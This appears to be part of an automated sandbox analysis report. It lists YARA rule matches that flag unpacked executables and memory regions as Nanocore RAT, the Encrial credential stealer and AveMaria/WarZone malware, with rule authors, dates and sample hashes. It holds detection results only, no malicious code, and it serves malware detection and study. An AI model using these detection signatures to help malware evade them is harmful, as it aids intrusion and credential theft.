        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
